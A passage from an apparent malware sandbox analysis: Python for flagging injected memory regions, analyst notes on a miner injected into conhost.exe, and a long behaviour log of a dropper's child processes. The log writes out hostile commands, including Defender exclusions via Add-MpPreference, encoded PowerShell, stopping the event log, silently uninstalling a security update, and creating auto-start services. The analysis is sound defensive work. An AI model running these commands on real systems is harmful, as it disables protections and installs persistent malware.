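    """Assumed layout: <proc>.<run>.<timestamp>.<base>.<protect>.<flags>.<type>.<extra>.sdmp"""
    stem = name[:-len(".sdmp")] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    return DumpRegion(
        process_index=int(parts[0], 16),
        base=int(parts[3], 16),
        protect=int(parts[4], 16),
        mem_type=int(parts[6], 16),
        rule=rule,
    )


def injection_indicators(regions):
    """Executable memory that is not backed by a loaded image is where hollowed or manually
    mapped payloads live; a rule hit there is a much stronger signal than a hit inside a
    module the loader mapped from disk."""
    return [r for r in regions if r.executable and not r.image_backed]


def describe(region: DumpRegion) -> str:
    return (f"proc {region.process_index} base 0x{region.base:X} protect 0x{region.protect:X} "
            f"{MEM_TYPE_NAMES.get(region.mem_type, hex(region.mem_type))} -> {region.rule}")


if __name__ == "__main__":
    regions = [parse_dump_name(n, r) for n, r in MEMORY_MATCHES]
    for r in regions:
        print(describe(r))
    for r in injection_indicators(regions):
        print("injection indicator:", describe(r))
```

Only the conhost.exe region comes out as an indicator: protect 0x40 (PAGE_EXECUTE_READWRITE) in MEM_PRIVATE memory, at the x64 default image base 0x140000000 that an ASLR-relocated system binary would not normally occupy. That is consistent with the miner having been written into conhost.exe's address space rather than loaded from disk, which is why the unpack name above is conhost.exe at 140000000 and not a dropped xmrig binary. The RedLine hit in fix.exe, by contrast, is in MEM_IMAGE memory, i.e. the loaded module itself.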
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@88/180@2/3
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F8560 GetLastError,FormatMessageW,WideCharToMultiByte, 6_2_00007FF7F04F8560
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File created: C:\Users\user\AppData\Local\SystemCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Global\yucvtrikidzunobm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\hamburger.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\activate.bat
Source: Setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Notepad.exe")
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Notepad.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Setup.exe Virustotal: Detection: 59%
Source: C:\Users\user\Desktop\Setup.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe"
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\mergedALL.exe "C:\Users\user\AppData\Local\Temp\mergedALL.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\etc test.exe "C:\Users\user\AppData\Local\Temp\etc test.exe"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\fix.exe "C:\Users\user\AppData\Local\Temp\fix.exe"
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\activate.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBKZWAPS"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UPFRTHSI"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OBKZWAPS"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UPFRTHSI"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: unknown Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\mergedALL.exe "C:\Users\user\AppData\Local\Temp\mergedALL.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\etc test.exe "C:\Users\user\AppData\Local\Temp\etc test.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\fix.exe "C:\Users\user\AppData\Local\Temp\fix.exe"
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UPFRTHSI"
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "UPFRTHSI"
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBKZWAPS"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OBKZWAPS"
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\activate.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Users\user\Desktop\Setup.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
